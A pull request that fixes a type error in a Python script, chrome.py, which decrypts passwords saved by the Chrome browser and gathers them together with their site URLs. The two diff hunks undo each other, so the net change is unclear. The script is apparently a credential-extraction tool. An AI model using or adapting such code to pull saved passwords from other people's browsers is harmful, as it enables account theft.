### PR TITLE
Update chrome.py & fix 'in <string>' requires string as left operand, not int error

### DIFF
--- a/chrome.py
+++ b/chrome.py
@@ -56,7 +56,7 @@ class ChromeWin:
         """ Windows Decryption Function """
         win32crypt = import_module('win32crypt')
         data = win32crypt.CryptUnprotectData(enc_passwd, None, None, None, 0)
-        return data[1]
+        return data[1].decode('utf8')
 
 
 class ChromeLinux:
@@ -113,7 +113,7 @@ class Chrome:
         data = {'data': []}
         for result in cursor.fetchall():
             _passwd = self.chrome_os.decrypt_func(result[2])
-            passwd = ''.join(i for i in str(_passwd) if i in string.printable)
+            passwd = ''.join(i for i in _passwd if i in string.printable)
             if result[1] or passwd:
                 _data = {}
                 _data['url'] = result[0]

--- a/chrome.py
+++ b/chrome.py
@@ -113,7 +113,7 @@ class Chrome:
         data = {'data': []}
         for result in cursor.fetchall():
             _passwd = self.chrome_os.decrypt_func(result[2])
-            passwd = ''.join(i for i in _passwd if i in string.printable)
+            passwd = ''.join(i for i in str(_passwd) if i in string.printable)
             if result[1] or passwd:
                 _data = {}
                 _data['url'] = result[0]


### PR DESCRIPTION
Just fixed `'in <string>' requires string as left operand, not int` 
Changed =>` passwd = ''.join(i for i in _passwd if i in string.printable)`
To => `passwd = ''.join(i for i in str(_passwd) if i in string.printable)`